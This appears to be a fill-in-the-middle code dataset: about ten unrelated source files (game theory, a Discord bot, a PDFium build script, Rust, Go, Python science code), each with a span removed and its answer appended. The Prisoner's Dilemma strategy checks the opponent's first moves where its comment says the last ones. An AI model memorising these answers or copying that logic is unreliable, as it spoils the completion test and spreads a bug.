# There are many scenarios that can be mapped to this concept, but the famous mapping by Albert W. Tucker called the
# "Prisoner's Dilemma" revolves around two prisoners, "A" and "B", guilty of the same crime and being held in
# separate interrogation rooms.
#
# Due to weak evidence held by the police, if both cooperate (do not betray the other), that will lead to a small sentence
# for each of them. If one cooperates and the other defects, the defector gets off free and the cooperator gets a
# large sentence. If they both defect, they both get an intermediate sentence.
# (spoiler alert) If the game is played exactly one time, the game-theory best choice for each player is to
# defect (or betray the other player).
#
# Robert Axelrod, professor of political science at the University of Michigan, held a tournament of competing
# strategies for the famous Prisoner's Dilemma in 1980.
#
# He had the insight that if the game is played many times in succession, then the history of play allows each player
# to take into account the "reputation" of the other player in making their choice of behavior.
# He invited some game theorists to submit algorithms that would be competed against each other in a computer tournament.
# Later he held another tournament and invited anyone to submit algorithms.
# The "Tit-For-Tat" algorithm seemed to do the best.
import sys
import PrisonersDilemmaTournament as choices # pick up choices.DEFECT and choices.COOPERATE
# The algo_mdo_tit_for_2_tat algorithm behaves as follows:
# On the first two moves it returns choices.COOPERATE
# On all subsequent moves:
# if the opponent did choices.DEFECT in the last two moves, we return choices.DEFECT this move
# else we return choices.COOPERATE this move
#
# note: the function name should be exactly the same as the filename but without the ".py"
# note: len(selfHist) and len(oppHist) should always be the same
#
def | (selfHist, oppHist, ID):
if len(selfHist) <= 1: # first two moves
return choices.COOPERATE
else:
if (choices.DEFECT == oppHist[1]) or (choices.DEFECT == oppHist[0]):
return choices.DEFECT
else:
return oppHist[0]
if __name__ == "__main__":
sys.stderr.write("ERROR - algo_mdo_tit_for_2_tat.py is not intended to be run stand-alone\n")
exit(-1)
| algo_mdo_tit_for_2_tat |
Link.js | import Character from "../../database/models/Character";
import Submission from "../../database/models/Submission";
import { Command } from "karasu";
import fs from "fs";
import path from "path";
export default class LinkCommand extends Command {
constructor(bot) {
super(bot, "link", {
description: "link-desc",
subCommands: [
new VerifyCommand(bot),
new DumpCommand(bot),
new LoadCommand(bot)
],
category: "anime"
});
}
run() {
return ["link-link", { url: `${process.env.HOST_URL}/crowdsource` }];
}
}
class | extends Command {
constructor(bot) {
super(bot, "verify", {
description: "link-verify-desc",
ownerOnly: true
});
}
async run(msg, _, __, respond) {
for (; ;) {
const submission = await Submission.random();
if (!submission) return ["link-empty-backlog"];
const character = await Character.findOne({ anidb_id: submission.anidb_id });
const user = this.bot.users.find(user => user.id === submission.user_id);
await msg.channel.createMessage({
embed: {
title: `${character.name} from ${character.animes.map(a => a.title).join(", ")}`,
image: {
url: character.photos[0]
},
footer: {
icon_url: user.avatarURL,
text: `Submitted by ${user.username}#${user.discriminator}`
}
}
});
await msg.channel.createMessage(`https://myanimelist.net/character/${submission.mal_id}`);
let response = await this.bot.collectorManager.awaitMessages({
limit: 1,
timeout: 120000,
filter: m => m.author.id === msg.author.id && m.channel.id === msg.channel.id
});
if (response) {
response = response.content;
if (response === "ok") {
character.mal_id = submission.mal_id;
} else if (response === "skip") {
continue;
} else if (response === "exit") {
msg.channel.createMessage("Ending");
break;
} else if (response !== "clear") {
break;
}
await Submission.findByIdAndDelete(submission._id);
const newDoc = await character.save();
respond(["link-linked", { name: newDoc.name, id: newDoc.mal_id }]);
} else {
break;
}
}
}
}
const dumpFile = "../../../cache/dump.js";
class DumpCommand extends Command {
constructor(bot) {
super(bot, "dump", {
description: "link-dump-desc",
ownerOnly: true
});
}
async run() {
const characters = await Character.find({ mal_id: { $exists: true } });
const links = characters.map(c => [c.anidb_id[0], c.mal_id]);
const content = `export const links = ${JSON.stringify(links)};`;
fs.writeFileSync(path.join(__dirname, dumpFile), content);
return ["link-dumped", { characters: characters.length }];
}
}
class LoadCommand extends Command {
constructor(bot) {
super(bot, "load", {
description: "link-load-desc",
ownerOnly: true
});
}
async run() {
delete require.cache[require.resolve(dumpFile)];
const { links } = require(dumpFile);
for (const link of links) {
await Character.findOneAndUpdate({ anidb_id: link[0] }, { mal_id: link[1] });
}
return ["link-loaded", { characters: links.length }];
}
} | VerifyCommand |
android.py | import glob
import os
import tarfile
from subprocess import check_call
import modules.config as c
import modules.functions as f
def run_task_build_pdfium():
f.debug("Building PDFium...")
target = "android"
build_dir = os.path.join("build", target)
f.create_dir(build_dir)
target_dir = os.path.join(build_dir, "pdfium")
f.remove_dir(target_dir)
cwd = build_dir
command = " ".join(
[
"gclient",
"config",
"--unmanaged",
"https://pdfium.googlesource.com/pdfium.git",
]
)
check_call(command, cwd=cwd, shell=True)
gclient_file = os.path.join(build_dir, ".gclient")
f.append_to_file(gclient_file, "target_os = [ 'android' ]")
cwd = build_dir
command = " ".join(["gclient", "sync"])
check_call(command, cwd=cwd, shell=True)
cwd = target_dir
command = " ".join(["git", "checkout", c.pdfium_git_commit])
check_call(command, cwd=cwd, shell=True)
def run_task_patch():
f.debug("Patching...")
source_dir = os.path.join("build", "android", "pdfium")
# build gn
source_file = os.path.join(
source_dir,
"BUILD.gn",
)
if f.file_line_has_content(source_file, 25, " ]\n"):
f.replace_line_in_file(source_file, 25, ' "FPDFSDK_EXPORTS",\n ]\n')
f.debug("Applied: Build GN")
else:
f.debug("Skipped: Build GN")
# build gn flags
source_file = os.path.join(
source_dir,
"BUILD.gn",
)
if f.file_line_has_content(source_file, 19, " cflags = []\n"):
f.replace_line_in_file(
source_file, 19, ' cflags = [ "-fvisibility=default" ]\n'
)
f.debug("Applied: Build GN Flags")
else:
f.debug("Skipped: Build GN Flags")
pass
def run_task_build():
f.debug("Building libraries...")
current_dir = os.getcwd()
# configs
for config in c.configurations_android:
# targets
for target in c.targets_android:
main_dir = os.path.join(
"build",
target["target_os"],
"pdfium",
"out",
"{0}-{1}-{2}".format(target["target_os"], target["target_cpu"], config),
)
f.remove_dir(main_dir)
f.create_dir(main_dir)
os.chdir(
os.path.join(
"build",
target["target_os"],
"pdfium",
)
)
# generating files...
f.debug(
'Generating files to arch "{0}" and configuration "{1}"...'.format(
target["target_cpu"], config
)
)
arg_is_debug = "true" if config == "debug" else "false"
args = []
args.append('target_os="{0}"'.format(target["pdfium_os"]))
args.append('target_cpu="{0}"'.format(target["target_cpu"]))
args.append("use_goma=false")
args.append("is_debug={0}".format(arg_is_debug))
args.append("pdf_use_skia=false")
args.append("pdf_use_skia_paths=false")
args.append("pdf_enable_xfa=false")
args.append("pdf_enable_v8=false")
args.append("is_component_build=true")
args.append("pdf_is_standalone=true")
args.append("pdf_bundle_freetype=true")
if config == "release":
args.append("symbol_level=0")
args_str = " ".join(args)
command = " ".join(
[
"gn",
"gen",
"out/{0}-{1}-{2}".format(
target["target_os"], target["target_cpu"], config
),
"--args='{0}'".format(args_str),
]
)
check_call(command, shell=True)
# compiling...
f.debug(
'Compiling to arch "{0}" and configuration "{1}"...'.format(
target["target_cpu"], config
)
)
command = " ".join(
[
"ninja",
"-C",
"out/{0}-{1}-{2}".format(
target["target_os"], target["target_cpu"], config
),
"pdfium",
"-v",
]
)
check_call(command, shell=True)
os.chdir(current_dir)
def run_task_install():
f.debug("Installing libraries...")
# configs
for config in c.configurations_android:
f.remove_dir(os.path.join("build", "android", config))
f.create_dir(os.path.join("build", "android", config))
# targets
for target in c.targets_android:
out_dir = "{0}-{1}-{2}".format(
target["target_os"], target["target_cpu"], config
)
source_lib_dir = os.path.join("build", "android", "pdfium", "out", out_dir)
lib_dir = os.path.join("build", "android", config, "lib")
target_dir = os.path.join(lib_dir, target["android_cpu"])
f.remove_dir(target_dir)
f.create_dir(target_dir)
for basename in os.listdir(source_lib_dir):
if basename.endswith(".so"):
pathname = os.path.join(source_lib_dir, basename)
if os.path.isfile(pathname):
f.copy_file2(pathname, target_dir)
# include
include_dir = os.path.join("build", "android", "pdfium", "public")
target_include_dir = os.path.join("build", "android", config, "include")
f.remove_dir(target_include_dir)
f.create_dir(target_include_dir)
for basename in os.listdir(include_dir):
if basename.endswith(".h"):
pathname = os.path.join(include_dir, basename)
if os.path.isfile(pathname):
f.copy_file2(pathname, target_include_dir)
def | ():
f.debug("Testing...")
for config in c.configurations_android:
for target in c.targets_android:
lib_dir = os.path.join(
"build", "android", config, "lib", target["android_cpu"]
)
command = " ".join(["file", os.path.join(lib_dir, "libpdfium.so")])
check_call(command, shell=True)
def run_task_archive():
f.debug("Archiving...")
current_dir = os.getcwd()
lib_dir = os.path.join(current_dir, "build", "android")
output_filename = os.path.join(current_dir, "android.tgz")
tar = tarfile.open(output_filename, "w:gz")
for configuration in c.configurations_android:
tar.add(
name=os.path.join(lib_dir, configuration),
arcname=os.path.basename(os.path.join(lib_dir, configuration)),
filter=lambda x: (
None
if "_" in x.name
and not x.name.endswith(".h")
and not x.name.endswith(".so")
and os.path.isfile(x.name)
else x
),
)
tar.close()
| run_task_test |
index_sparse.rs | // Copyright 2021 Datafuse Labs.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use std::collections::HashMap;
use common_datablocks::DataBlock;
use common_datavalues2::DataValue;
use common_exception::Result;
use common_planners::Expression;
use crate::storages::index::IndexSchemaVersion;
#[derive(Clone, Debug, PartialEq, serde::Serialize, serde::Deserialize)]
pub struct SparseIndexValue {
// Min value of this granule.
pub min: DataValue,
// Max value of this granule.
pub max: DataValue,
// The page number to read in the data file.
pub page_no: i64,
}
/// Sparse index.
#[derive(Clone, Debug, PartialEq, serde::Serialize, serde::Deserialize)]
pub struct SparseIndex {
pub col: String,
// Sparse index.
pub values: Vec<SparseIndexValue>,
// Version.
pub version: IndexSchemaVersion,
}
#[allow(dead_code)]
impl SparseIndex {
fn create(col: String) -> Self {
SparseIndex {
col, |
pub fn typ(&self) -> &str {
"sparse"
}
// Push one sparse value to the sparse index.
pub fn push(&mut self, val: SparseIndexValue) -> Result<()> {
self.values.push(val);
Ok(())
}
pub fn create_index(keys: &[String], blocks: &[DataBlock]) -> Result<Vec<SparseIndex>> {
let mut keys_idx = vec![];
for key in keys {
let mut sparse = SparseIndex::create(key.clone());
for (page_no, page) in blocks.iter().enumerate() {
let min = page.first(key.as_str())?;
let max = page.last(key.as_str())?;
sparse.push(SparseIndexValue {
min,
max,
page_no: page_no as i64,
})?;
}
keys_idx.push(sparse);
}
Ok(keys_idx)
}
/// Apply the index and get the result:
/// (true, ...) : need read the whole file
/// (false, [0, 3]) : need to read the page-0 and page-3 only.
pub fn apply_index(
_idx_map: HashMap<String, SparseIndex>,
_expr: &Expression,
) -> Result<(bool, Vec<i64>)> {
// TODO(bohu): expression check.
Ok((true, vec![]))
}
} | values: vec![],
version: IndexSchemaVersion::V1,
}
} |
CgAlbum.esm.js | // THIS FILE IS AUTO GENERATED
import { GenIcon } from '../lib';
export function | (props) {
return GenIcon({"tag":"svg","attr":{"viewBox":"0 0 24 24","fill":"none"},"child":[{"tag":"path","attr":{"fillRule":"evenodd","clipRule":"evenodd","d":"M2 19C2 20.6569 3.34315 22 5 22H19C20.6569 22 22 20.6569 22 19V5C22 3.34315 20.6569 2 19 2H5C3.34315 2 2 3.34315 2 5V19ZM20 19C20 19.5523 19.5523 20 19 20H5C4.44772 20 4 19.5523 4 19V5C4 4.44772 4.44772 4 5 4H10V12.0111L12.395 12.0112L14.0001 9.86419L15.6051 12.0112H18.0001L18 4H19C19.5523 4 20 4.44772 20 5V19ZM16 4H12V9.33585L14.0001 6.66046L16 9.33571V4Z","fill":"currentColor"}}]})(props);
};
| CgAlbum |
cli.py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import sys, os
from pathlib import Path
import qlib
import fire
import pandas as pd
import ruamel.yaml as yaml
from qlib.config import C
from qlib.model.trainer import task_train
def get_path_list(path):
|
def sys_config(config, config_path):
"""
Configure the `sys` section
Parameters
----------
config : dict
configuration of the workflow.
config_path : str
path of the configuration
"""
sys_config = config.get("sys", {})
# abspath
for p in get_path_list(sys_config.get("path", [])):
sys.path.append(p)
# relative path to config path
for p in get_path_list(sys_config.get("rel_path", [])):
sys.path.append(str(Path(config_path).parent.resolve().absolute() / p))
# worflow handler function
def workflow(config_path, experiment_name="workflow", uri_folder="mlruns"):
with open(config_path) as fp:
config = yaml.load(fp, Loader=yaml.SafeLoader)
# config the `sys` section
sys_config(config, config_path)
exp_manager = C["exp_manager"]
exp_manager["kwargs"]["uri"] = "file:" + str(Path(os.getcwd()).resolve() / uri_folder)
qlib.init(**config.get("qlib_init"), exp_manager=exp_manager)
task_train(config.get("task"), experiment_name=experiment_name)
# function to run worklflow by config
def run():
fire.Fire(workflow)
if __name__ == "__main__":
run()
| if isinstance(path, str):
return [path]
else:
return [p for p in path] |
constants.ts | export const CFGREDUCTION_REQUEST = 'CFGREDUCTION_REQUEST';
export const CFGREDUCTION_SUCCESS = 'CFGREDUCTION_SUCCESS';
export const CFGREDUCTION_CANCEL = 'CFGREDUCTION_CANCEL';
export const CFGREDUCTION_FAIL = 'CFGREDUCTION_FAIL'; | ||
csv_analys.go | package main
import (
"bufio"
"fmt"
"os"
"strings"
)
func main3() | {
uidVerFile := "I:\\test\\logs\\版本活跃用户810.csv"
uidSet := make(map[string]bool, 150000)
if uidVer, err := os.OpenFile(uidVerFile, os.O_RDONLY, os.ModePerm); err == nil {
br := bufio.NewReader(uidVer)
_, _ = br.ReadBytes('\n')
for {
l, e := br.ReadBytes('\n')
if e != nil && len(l) == 0 {
break
}
line := string(l)
lineData := strings.Split(line, ",")
uid, ver := lineData[0], lineData[1]
if ver == "6.3" || ver == "6.3.1" || ver == "6.3.2" {
uidSet[uid] = true
}
}
fmt.Println(len(uidSet))
}
rfmFilePath := "I:\\test\\logs\\分层模型用户数据报表_810.csv"
if rfm, err := os.OpenFile(rfmFilePath, os.O_RDONLY, os.ModePerm); err == nil {
br := bufio.NewReader(rfm)
_, _ = br.ReadBytes('\n')
tMapCount := make(map[string]int)
for {
l, e := br.ReadBytes('\n')
if e != nil && len(l) == 0 {
break
}
line := string(l)
lineData := strings.Split(line, ",")
uid, t := lineData[2], lineData[9]
if uidSet[uid] {
tMapCount[t]++
}
}
fmt.Println(tMapCount)
}
}
|
|
netperf_rfc2544.py | # Copyright (c) 2015
#
# All rights reserved.
#
# This file is distributed under the Clear BSD license.
# The full text can be found in LICENSE in the root directory.
from boardfarm.devices import prompt
from boardfarm.tests import rootfs_boot
class NetperfRFC2544(rootfs_boot.RootFSBootTest):
| '''Single test to simulate RFC2544'''
def runTest(self):
board = self.dev.board
lan = self.dev.lan
for sz in ["74", "128", "256", "512", "1024", "1280", "1518"]:
print("running %s UDP test" % sz)
lan.sendline(
'netperf -H 192.168.0.1 -t UDP_STREAM -l 60 -- -m %s' % sz)
lan.expect_exact(
'netperf -H 192.168.0.1 -t UDP_STREAM -l 60 -- -m %s' % sz)
lan.expect('UDP UNIDIRECTIONAL')
lan.expect(prompt, timeout=90)
board.sendline()
board.expect(prompt) |
|
system_ime.rs | use crate::avm1::activation::Activation;
use crate::avm1::error::Error;
use crate::avm1::listeners::Listeners;
use crate::avm1::object::Object;
use crate::avm1::property::Attribute;
use crate::avm1::property::Attribute::{DontDelete, DontEnum, ReadOnly};
use crate::avm1::{ScriptObject, TObject, Value};
use crate::context::UpdateContext;
use gc_arena::MutationContext;
use std::convert::Into;
fn on_ime_composition<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> |
fn do_conversion<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok(true.into())
}
fn get_conversion_mode<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok("KOREAN".into())
}
fn get_enabled<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok(false.into())
}
fn set_composition_string<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok(false.into())
}
fn set_conversion_mode<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok(false.into())
}
fn set_enabled<'gc>(
_activation: &mut Activation<'_, 'gc>,
_context: &mut UpdateContext<'_, 'gc, '_>,
_this: Object<'gc>,
_args: &[Value<'gc>],
) -> Result<Value<'gc>, Error<'gc>> {
Ok(false.into())
}
pub fn create<'gc>(
gc_context: MutationContext<'gc, '_>,
proto: Option<Object<'gc>>,
fn_proto: Option<Object<'gc>>,
listener: &Listeners<'gc>,
) -> Object<'gc> {
let mut ime = ScriptObject::object(gc_context, proto);
register_listener!(gc_context, ime, listener, fn_proto, ime);
ime.define_value(
gc_context,
"ALPHANUMERIC_FULL",
"ALPHANUMERIC_FULL".into(),
Attribute::DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"ALPHANUMERIC_HALF",
"ALPHANUMERIC_HALF".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"CHINESE",
"CHINESE".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"JAPANESE_HIRAGANA",
"JAPANESE_HIRAGANA".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"JAPANESE_KATAKANA_FULL",
"JAPANESE_KATAKANA_FULL".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"KOREAN",
"KOREAN".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.define_value(
gc_context,
"UNKNOWN",
"UNKNOWN".into(),
DontDelete | ReadOnly | DontEnum,
);
ime.force_set_function(
"onIMEComposition",
on_ime_composition,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"doConversion",
do_conversion,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"getConversionMode",
get_conversion_mode,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"getEnabled",
get_enabled,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"setCompositionString",
set_composition_string,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"setConversionMode",
set_conversion_mode,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.force_set_function(
"setEnabled",
set_enabled,
gc_context,
DontDelete | ReadOnly | DontEnum,
fn_proto,
);
ime.into()
}
| {
Ok(false.into())
} |
fittheories.py | # coding: utf-8
#/*##########################################################################
#
# Copyright (c) 2004-2020 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
########################################################################### */
"""This modules provides a set of fit functions and associated
estimation functions in a format that can be imported into a
:class:`silx.math.fit.FitManager` instance.
These functions are well suited for fitting multiple gaussian shaped peaks
typically found in spectroscopy data. The estimation functions are designed
to detect how many peaks are present in the data, and provide an initial
estimate for their height, their center location and their full-width
at half maximum (fwhm).
The limitation of these estimation algorithms is that only gaussians having a
similar fwhm can be detected by the peak search algorithm.
This *search fwhm* can be defined by the user, if
he knows the characteristics of his data, or can be automatically estimated
based on the fwhm of the largest peak in the data.
The source code of this module can serve as template for defining your own
fit functions.
The functions to be imported by :meth:`FitManager.loadtheories` are defined by
a dictionary :const:`THEORY`: with the following structure::
from silx.math.fit.fittheory import FitTheory
THEORY = {
'theory_name_1': FitTheory(
description='Description of theory 1',
function=fitfunction1,
parameters=('param name 1', 'param name 2', …),
estimate=estimation_function1,
configure=configuration_function1,
derivative=derivative_function1),
'theory_name_2': FitTheory(…),
}
.. note::
Consider using an OrderedDict instead of a regular dictionary, when
defining your own theory dictionary, if the order matters to you.
This will likely be the case if you intend to load a selection of
functions in a GUI such as :class:`silx.gui.fit.FitManager`.
Theory names can be customized (e.g. ``gauss, lorentz, splitgauss``…).
The mandatory parameters for :class:`FitTheory` are ``function`` and
``parameters``.
You can also define an ``INIT`` function that will be executed by
:meth:`FitManager.loadtheories`.
See the documentation of :class:`silx.math.fit.fittheory.FitTheory`
for more information.
Module members:
---------------
"""
import numpy
from collections import OrderedDict
import logging
from silx.math.fit import functions
from silx.math.fit.peaks import peak_search, guess_fwhm
from silx.math.fit.filters import strip, savitsky_golay
from silx.math.fit.leastsq import leastsq
from silx.math.fit.fittheory import FitTheory
_logger = logging.getLogger(__name__)
__authors__ = ["V.A. Sole", "P. Knobel"]
__license__ = "MIT"
__date__ = "15/05/2017"
DEFAULT_CONFIG = {
'NoConstraintsFlag': False,
'PositiveFwhmFlag': True,
'PositiveHeightAreaFlag': True,
'SameFwhmFlag': False,
'QuotedPositionFlag': False, # peak not outside data range
'QuotedEtaFlag': False, # force 0 < eta < 1
# Peak detection
'AutoScaling': False,
'Yscaling': 1.0,
'FwhmPoints': 8,
'AutoFwhm': True,
'Sensitivity': 2.5,
'ForcePeakPresence': True,
# Hypermet
'HypermetTails': 15,
'QuotedFwhmFlag': 0,
'MaxFwhm2InputRatio': 1.5,
'MinFwhm2InputRatio': 0.4,
# short tail parameters
'MinGaussArea4ShortTail': 50000.,
'InitialShortTailAreaRatio': 0.050,
'MaxShortTailAreaRatio': 0.100,
'MinShortTailAreaRatio': 0.0010,
'InitialShortTailSlopeRatio': 0.70,
'MaxShortTailSlopeRatio': 2.00,
'MinShortTailSlopeRatio': 0.50,
# long tail parameters
'MinGaussArea4LongTail': 1000.0,
'InitialLongTailAreaRatio': 0.050,
'MaxLongTailAreaRatio': 0.300,
'MinLongTailAreaRatio': 0.010,
'InitialLongTailSlopeRatio': 20.0,
'MaxLongTailSlopeRatio': 50.0,
'MinLongTailSlopeRatio': 5.0,
# step tail
'MinGaussHeight4StepTail': 5000.,
'InitialStepTailHeightRatio': 0.002,
'MaxStepTailHeightRatio': 0.0100,
'MinStepTailHeightRatio': 0.0001,
# Hypermet constraints
# position in range [estimated position +- estimated fwhm/2]
'HypermetQuotedPositionFlag': True,
'DeltaPositionFwhmUnits': 0.5,
'SameSlopeRatioFlag': 1,
'SameAreaRatioFlag': 1,
# Strip bg removal
'StripBackgroundFlag': True,
'SmoothingFlag': True,
'SmoothingWidth': 5,
'StripWidth': 2,
'StripIterations': 5000,
'StripThresholdFactor': 1.0}
"""This dictionary defines default configuration parameters that have effects
on fit functions and estimation functions, mainly on fit constraints.
This dictionary is accessible as attribute :attr:`FitTheories.config`,
which can be modified by configuration functions defined in
:const:`CONFIGURE`.
"""
CFREE = 0
CPOSITIVE = 1
CQUOTED = 2
CFIXED = 3
CFACTOR = 4
CDELTA = 5
CSUM = 6
CIGNORED = 7
class FitTheories(object):
"""Cla | uns = FitTheories()
THEORY = OrderedDict((
('Gaussians',
FitTheory(description='Gaussian functions',
function=functions.sum_gauss,
parameters=('Height', 'Position', 'FWHM'),
estimate=fitfuns.estimate_height_position_fwhm,
configure=fitfuns.configure)),
('Lorentz',
FitTheory(description='Lorentzian functions',
function=functions.sum_lorentz,
parameters=('Height', 'Position', 'FWHM'),
estimate=fitfuns.estimate_height_position_fwhm,
configure=fitfuns.configure)),
('Area Gaussians',
FitTheory(description='Gaussian functions (area)',
function=functions.sum_agauss,
parameters=('Area', 'Position', 'FWHM'),
estimate=fitfuns.estimate_agauss,
configure=fitfuns.configure)),
('Area Lorentz',
FitTheory(description='Lorentzian functions (area)',
function=functions.sum_alorentz,
parameters=('Area', 'Position', 'FWHM'),
estimate=fitfuns.estimate_alorentz,
configure=fitfuns.configure)),
('Pseudo-Voigt Line',
FitTheory(description='Pseudo-Voigt functions',
function=functions.sum_pvoigt,
parameters=('Height', 'Position', 'FWHM', 'Eta'),
estimate=fitfuns.estimate_pvoigt,
configure=fitfuns.configure)),
('Area Pseudo-Voigt',
FitTheory(description='Pseudo-Voigt functions (area)',
function=functions.sum_apvoigt,
parameters=('Area', 'Position', 'FWHM', 'Eta'),
estimate=fitfuns.estimate_apvoigt,
configure=fitfuns.configure)),
('Split Gaussian',
FitTheory(description='Asymmetric gaussian functions',
function=functions.sum_splitgauss,
parameters=('Height', 'Position', 'LowFWHM',
'HighFWHM'),
estimate=fitfuns.estimate_splitgauss,
configure=fitfuns.configure)),
('Split Lorentz',
FitTheory(description='Asymmetric lorentzian functions',
function=functions.sum_splitlorentz,
parameters=('Height', 'Position', 'LowFWHM', 'HighFWHM'),
estimate=fitfuns.estimate_splitgauss,
configure=fitfuns.configure)),
('Split Pseudo-Voigt',
FitTheory(description='Asymmetric pseudo-Voigt functions',
function=functions.sum_splitpvoigt,
parameters=('Height', 'Position', 'LowFWHM',
'HighFWHM', 'Eta'),
estimate=fitfuns.estimate_splitpvoigt,
configure=fitfuns.configure)),
('Step Down',
FitTheory(description='Step down function',
function=functions.sum_stepdown,
parameters=('Height', 'Position', 'FWHM'),
estimate=fitfuns.estimate_stepdown,
configure=fitfuns.configure)),
('Step Up',
FitTheory(description='Step up function',
function=functions.sum_stepup,
parameters=('Height', 'Position', 'FWHM'),
estimate=fitfuns.estimate_stepup,
configure=fitfuns.configure)),
('Slit',
FitTheory(description='Slit function',
function=functions.sum_slit,
parameters=('Height', 'Position', 'FWHM', 'BeamFWHM'),
estimate=fitfuns.estimate_slit,
configure=fitfuns.configure)),
('Atan',
FitTheory(description='Arctan step up function',
function=functions.atan_stepup,
parameters=('Height', 'Position', 'Width'),
estimate=fitfuns.estimate_stepup,
configure=fitfuns.configure)),
('Hypermet',
FitTheory(description='Hypermet functions',
function=fitfuns.ahypermet, # customized version of functions.sum_ahypermet
parameters=('G_Area', 'Position', 'FWHM', 'ST_Area',
'ST_Slope', 'LT_Area', 'LT_Slope', 'Step_H'),
estimate=fitfuns.estimate_ahypermet,
configure=fitfuns.configure)),
# ('Periodic Gaussians',
# FitTheory(description='Periodic gaussian functions',
# function=functions.periodic_gauss,
# parameters=('N', 'Delta', 'Height', 'Position', 'FWHM'),
# estimate=fitfuns.estimate_periodic_gauss,
# configure=fitfuns.configure))
('Degree 2 Polynomial',
FitTheory(description='Degree 2 polynomial'
'\ny = a*x^2 + b*x +c',
function=fitfuns.poly,
parameters=['a', 'b', 'c'],
estimate=fitfuns.estimate_quadratic)),
('Degree 3 Polynomial',
FitTheory(description='Degree 3 polynomial'
'\ny = a*x^3 + b*x^2 + c*x + d',
function=fitfuns.poly,
parameters=['a', 'b', 'c', 'd'],
estimate=fitfuns.estimate_cubic)),
('Degree 4 Polynomial',
FitTheory(description='Degree 4 polynomial'
'\ny = a*x^4 + b*x^3 + c*x^2 + d*x + e',
function=fitfuns.poly,
parameters=['a', 'b', 'c', 'd', 'e'],
estimate=fitfuns.estimate_quartic)),
('Degree 5 Polynomial',
FitTheory(description='Degree 5 polynomial'
'\ny = a*x^5 + b*x^4 + c*x^3 + d*x^2 + e*x + f',
function=fitfuns.poly,
parameters=['a', 'b', 'c', 'd', 'e', 'f'],
estimate=fitfuns.estimate_quintic)),
))
"""Dictionary of fit theories: fit functions and their associated estimation
function, parameters list, configuration function and description.
"""
def test(a):
from silx.math.fit import fitmanager
x = numpy.arange(1000).astype(numpy.float)
p = [1500, 100., 50.0,
1500, 700., 50.0]
y_synthetic = functions.sum_gauss(x, *p) + 1
fit = fitmanager.FitManager(x, y_synthetic)
fit.addtheory('Gaussians', functions.sum_gauss, ['Height', 'Position', 'FWHM'],
a.estimate_height_position_fwhm)
fit.settheory('Gaussians')
fit.setbackground('Linear')
fit.estimate()
fit.runfit()
y_fit = fit.gendata()
print("Fit parameter names: %s" % str(fit.get_names()))
print("Theoretical parameters: %s" % str(numpy.append([1, 0], p)))
print("Fitted parameters: %s" % str(fit.get_fitted_parameters()))
try:
from silx.gui import qt
from silx.gui.plot import plot1D
app = qt.QApplication([])
# Offset of 1 to see the difference in log scale
plot1D(x, (y_synthetic + 1, y_fit), "Input data + 1, Fit")
app.exec_()
except ImportError:
_logger.warning("Unable to load qt binding, can't plot results.")
if __name__ == "__main__":
test(fitfuns)
| ss wrapping functions from :class:`silx.math.fit.functions`
and providing estimate functions for all of these fit functions."""
def __init__(self, config=None):
if config is None:
